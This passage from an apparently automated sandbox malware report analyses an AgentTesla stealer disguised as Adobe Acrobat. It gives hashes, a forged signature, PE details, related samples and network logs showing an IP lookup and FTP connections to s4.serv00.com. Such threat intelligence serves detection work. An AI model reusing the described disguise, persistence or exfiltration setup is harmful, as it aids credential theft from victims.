                                                                • 213.189.52.181
                                                                api.ipify.orgHCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                ZWyrFp7WBM.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                xnlP06YunJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                kbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 172.67.74.152
                                                                tmezkNPazz.exeGet hashmaliciousNetSupport RATBrowse
                                                                • 104.26.12.205
                                                                Launcher.exeGet hashmaliciousGrowtopia, Phoenix StealerBrowse
                                                                • 104.26.13.205
                                                                Launcher.exeGet hashmaliciousGrowtopiaBrowse
                                                                • 104.26.13.205
                                                                Launcher.exeGet hashmaliciousGrowtopia, Phoenix StealerBrowse
                                                                • 104.26.12.205
                                                                5aQpYG37db.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.12.205
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CLOUDFLARENETUSmCqTwcbnfm.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                • 104.21.16.1
                                                                n8l3NmC5EH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.96.1
                                                                DbAAqJQFmx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.48.1
                                                                Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msgGet hashmaliciousScreenConnect ToolBrowse
                                                                • 1.1.1.1
                                                                OW1i3n5K3s.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 104.21.32.1
                                                                Dropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                • 162.159.135.232
                                                                XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.96.1
                                                                44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.112.1
                                                                6KzB3ReZ6z.exeGet hashmaliciousFormBookBrowse
                                                                • 188.114.96.3
                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.21.80.1
                                                                ECO-ATMAN-PLECO-ATMAN-PLkbdXtadZsM.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                NBdxPYAgZf.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                5aQpYG37db.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                fls3eql72b.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                SecuriteInfo.com.Win32.CrypterX-gen.18789.13214.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                I24560875423784426VTL.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                PO#10800.exeGet hashmaliciousFormBookBrowse
                                                                • 212.91.26.153
                                                                HBL - Invoice PIOP94893KM.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                I2456087542378TL.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                REF-ALYAV-QINHP5-TIS-L202299 - (AL DHAFRA) SUPPLY.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 213.189.52.181
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0en8l3NmC5EH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205
                                                                DbAAqJQFmx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205
                                                                OW1i3n5K3s.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 104.26.13.205
                                                                SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                • 104.26.13.205
                                                                XFo9jVGyLQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205
                                                                44zFWmsOGn.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205
                                                                UqdykLLTA2.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 104.26.13.205
                                                                GBYfjUz4a5.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                • 104.26.13.205
                                                                HCoITD94bW.exeGet hashmaliciousAgentTeslaBrowse
                                                                • 104.26.13.205
                                                                SecuriteInfo.com.Program.Unwanted.5412.9015.527.exeGet hashmaliciousPureLog StealerBrowse
                                                                • 104.26.13.205
                                                                No context
                                                                Process:C:\Users\user\Desktop\x4l3iVpFSc.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):3137440
                                                                Entropy (8bit):7.2237258987749255
                                                                Encrypted:false
                                                                SSDEEP:49152:zATFMrTscHkZT/UwBgILLUjxZzw1i2yACuAjENraI:cJM3spwwBfUj3z4i8CufNr
                                                                MD5:F34B45032D884D86F62B2A0331A1C9DE
                                                                SHA1:48B550D96098933548A7787F4B8E96DE25FC1BBA
                                                                SHA-256:184A555EB9E981564E4DD08321F466D1F643C6082D309A2ACF6EDE5ADD96C7CC
                                                                SHA-512:6BD00F7DC4DA45AC35A10A5568DD6125C2AF3CBBE9833A384B35034C4F2F99B383C3034A684155CDDC58D28DFCDCCECE60ACE5900D46D6B050122919EEC5CEB1
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Virustotal, Detection: 64%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 61%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g..................*.........n"*.. ...@*...@.. ....................... 0...........`................................. "*.K....@*............../..)....0...................................................... ............... ..H............text...t.*.. ....*................. ..`.rsrc.......@*.......*.............@..@.reloc........0......./.............@..B................P"*.....H.......\...lp...........E..R.%..........................................*...(....*..0.......... ........8........E....I...........Z.......{...........2...q...........8D.....r...p(...... ....~....{....:....& ....8.......(....9.... ....8......9E... ....8q......(....:.... ....8Z...8p... ....~....{....:A...& ....86.... ....~....{:...9!...& ....8....8.... ....~....{....:....& ....8....... ....8....*.(...... ....~....{....:....& ....8........E........8.....$...& ....~....{....9...
                                                                Process:C:\Users\user\Desktop\x4l3iVpFSc.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Reputation:high, very likely benign file
                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):7.2237258987749255
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:x4l3iVpFSc.exe
                                                                File size:3'137'440 bytes
                                                                MD5:f34b45032d884d86f62b2a0331a1c9de
                                                                SHA1:48b550d96098933548a7787f4b8e96de25fc1bba
                                                                SHA256:184a555eb9e981564e4dd08321f466d1f643c6082d309a2acf6ede5add96c7cc
                                                                SHA512:6bd00f7dc4da45ac35a10a5568dd6125c2af3cbbe9833a384b35034c4f2f99b383c3034a684155cddc58d28dfcdccece60ace5900d46d6b050122919eec5ceb1
                                                                SSDEEP:49152:zATFMrTscHkZT/UwBgILLUjxZzw1i2yACuAjENraI:cJM3spwwBfUj3z4i8CufNr
                                                                TLSH:F1E5F10AB68ACF91C64F137AD8938AF846ABED00ED06D3CB31C93F6A36B37555941147
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..................*.........n"*.. ...@*...@.. ....................... 0...........`................................
                                                                Icon Hash:2d525272484c550b
                                                                Entrypoint:0x6a226e
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x67A9E384 [Mon Feb 10 11:31:16 2025 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Signature Valid:false
                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                Error Number:-2146869232
                                                                Not Before, Not After
                                                                • 03/11/2023 01:00:00 05/11/2025 00:59:59
                                                                Subject Chain
                                                                • CN=Adobe Inc., OU=Acrobat DC, O=Adobe Inc., L=San Jose, S=ca, C=US, SERIALNUMBER=2748129, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                Version:3
                                                                Thumbprint MD5:464C015DAA50884AB4DD5502E6B164B0
                                                                Thumbprint SHA-1:96B7B1EF175BBA4BDE33A05402134289B28B5BCB
                                                                Thumbprint SHA-256:ABC429325881B54BEC561B7B5A635E0E0AC9C94742F1324EBE5EB9AF6AE0CCC5
                                                                Serial:0D1A340F78D7D000E089FDBAAD6522DF
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2a22200x4b.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x2a40000x5adc8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x2fb6000x29a0.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x3000000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x2a02740x2a0400a402c069cc1998ea55b02106b2985ff9unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x2a40000x5adc80x5ae00fc443a3483fad2793d8c09f14cc4bf71False0.034823117262723524data2.4041222815062024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x3000000xc0x2009675be37979c54edd87c50dad4170385False0.044921875MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "*"0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x2a42200x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 11811 x 11811 px/m0.022916235168801966
                                                                RT_ICON0x2e62480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 11811 x 11811 px/m0.04400804448124926
                                                                RT_ICON0x2f6a700x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 11811 x 11811 px/m0.07853094000944733
                                                                RT_ICON0x2fac980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 11811 x 11811 px/m0.10020746887966805
                                                                RT_ICON0x2fd2400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 11811 x 11811 px/m0.14329268292682926
                                                                RT_ICON0x2fe2e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 11811 x 11811 px/m0.20035460992907803
                                                                RT_GROUP_ICON0x2fe7500x5adata0.7666666666666667
                                                                RT_VERSION0x2fe7ac0x42edata0.40373831775700936
                                                                RT_MANIFEST0x2febdc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                DLLImport
                                                                mscoree.dll_CorExeMain
                                                                DescriptionData
                                                                Translation0x0000 0x04b0
                                                                CommentsAdobe Acrobat
                                                                CompanyNameAdobe Systems Incorporated
                                                                FileDescriptionAdobe Acrobat
                                                                FileVersion24.5.20320.0
                                                                InternalNameLnhyowpy.exe
                                                                LegalCopyrightCopyright 1984-2024 Adobe Systems Incorporated and its licensors. All rights reserved.
                                                                LegalTrademarks
                                                                OriginalFilenameLnhyowpy.exe
                                                                ProductNameAdobe Acrobat
                                                                ProductVersion24.5.20320.0
                                                                Assembly Version24.5.20320.0
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 7, 2025 23:37:34.189991951 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:34.190025091 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:34.190093040 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:34.195751905 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:34.195765018 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:35.982525110 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:35.982661009 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:35.986433029 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:35.986443996 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:35.986680984 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:36.037422895 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:36.080328941 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:36.466712952 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:36.490196943 CET44349687104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:37:36.490345001 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:36.496016979 CET49687443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:37:37.199187040 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:37:37.204251051 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:37.204440117 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:37:37.802586079 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:37.802874088 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:37:37.807926893 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:37.995435953 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:37.995651960 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:37:38.000670910 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:41.742722034 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:41.790992975 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:37:41.826566935 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:37:41.832070112 CET2149688213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:37:41.832130909 CET4968821192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:17.322293043 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:17.322350979 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:17.322447062 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:17.326107979 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:17.326127052 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.090944052 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.091026068 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:19.094892979 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:19.094906092 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.095235109 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.134984016 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:19.149498940 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:19.196335077 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.558576107 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.587529898 CET44349691104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:19.588138103 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:19.593656063 CET49691443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:20.092535019 CET4969221192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:20.097727060 CET2149692213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:20.097867966 CET4969221192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:20.694922924 CET2149692213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:20.695208073 CET4969221192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:20.700190067 CET2149692213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:20.891527891 CET2149692213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:20.891676903 CET4969221192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:20.896708965 CET2149692213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:26.114947081 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:26.114991903 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:26.115053892 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:26.118654966 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:26.118663073 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:26.165648937 CET2149692213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:26.213164091 CET4969221192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:27.801697969 CET4969221192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:27.882249117 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:27.882390022 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:27.884215117 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:27.884228945 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:27.884494066 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:27.931947947 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:27.943239927 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:27.988326073 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:28.493695021 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:28.512425900 CET44349693104.26.13.205192.168.2.10
                                                                Mar 7, 2025 23:38:28.516844988 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:28.519275904 CET49693443192.168.2.10104.26.13.205
                                                                Mar 7, 2025 23:38:29.031874895 CET4969421192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:29.037106991 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:29.041124105 CET4969421192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:29.645944118 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:29.646142006 CET4969421192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:29.651300907 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:29.839858055 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:29.840059042 CET4969421192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:29.845108986 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:34.306725025 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:34.353852034 CET4969421192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:34.383882046 CET4969421192.168.2.10213.189.52.181
                                                                Mar 7, 2025 23:38:34.389307976 CET2149694213.189.52.181192.168.2.10
                                                                Mar 7, 2025 23:38:34.389384985 CET4969421192.168.2.10213.189.52.181
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Mar 7, 2025 23:37:34.172693014 CET6241253192.168.2.101.1.1.1
                                                                Mar 7, 2025 23:37:34.179807901 CET53624121.1.1.1192.168.2.10
                                                                Mar 7, 2025 23:37:37.189496994 CET5387253192.168.2.101.1.1.1
                                                                Mar 7, 2025 23:37:37.198640108 CET53538721.1.1.1192.168.2.10
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Mar 7, 2025 23:37:34.172693014 CET192.168.2.101.1.1.10xab21Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                Mar 7, 2025 23:37:37.189496994 CET192.168.2.101.1.1.10x3c9fStandard query (0)s4.serv00.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Mar 7, 2025 23:37:34.179807901 CET1.1.1.1192.168.2.100xab21No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                Mar 7, 2025 23:37:34.179807901 CET1.1.1.1192.168.2.100xab21No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                Mar 7, 2025 23:37:34.179807901 CET1.1.1.1192.168.2.100xab21No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                Mar 7, 2025 23:37:37.198640108 CET1.1.1.1192.168.2.100x3c9fNo error (0)s4.serv00.com213.189.52.181A (IP address)IN (0x0001)false
                                                                • api.ipify.org
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1049687104.26.13.2054437508C:\Users\user\Desktop\x4l3iVpFSc.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-07 22:37:36 UTC155OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2025-03-07 22:37:36 UTC427INHTTP/1.1 200 OK
                                                                Date: Fri, 07 Mar 2025 22:37:36 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 13
                                                                Connection: close
                                                                Vary: Origin
                                                                cf-cache-status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 91cd940d9882fc33-IAD
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=30993&min_rtt=23315&rtt_var=13450&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=124185&cwnd=238&unsent_bytes=0&cid=ff9c947d596c3089&ts=626&x=0"
                                                                2025-03-07 22:37:36 UTC13INData Raw: 32 34 2e 33 38 2e 32 35 33 2e 31 39 31
                                                                Data Ascii: 24.38.253.191


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1049691104.26.13.2054437992C:\Users\user\AppData\Roaming\Adobe\adobe.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-03-07 22:38:19 UTC155OUTGET / HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                Host: api.ipify.org
                                                                Connection: Keep-Alive
                                                                2025-03-07 22:38:19 UTC426INHTTP/1.1 200 OK
                                                                Date: Fri, 07 Mar 2025 22:38:19 GMT
                                                                Content-Type: text/plain
                                                                Content-Length: 13
                                                                Connection: close
                                                                Vary: Origin
                                                                cf-cache-status: DYNAMIC
                                                                Server: cloudflare
                                                                CF-RAY: 91cd951b08e443bc-EWR
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18813&min_rtt=17841&rtt_var=6704&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=131672&cwnd=251&unsent_bytes=0&cid=49c34dc00cc58184&ts=640&x=0"
                                                                2025-03-07 22:38:19 UTC13INData Raw: 32 34 2e 33 38 2e 32 35 33 2e 31 39 31
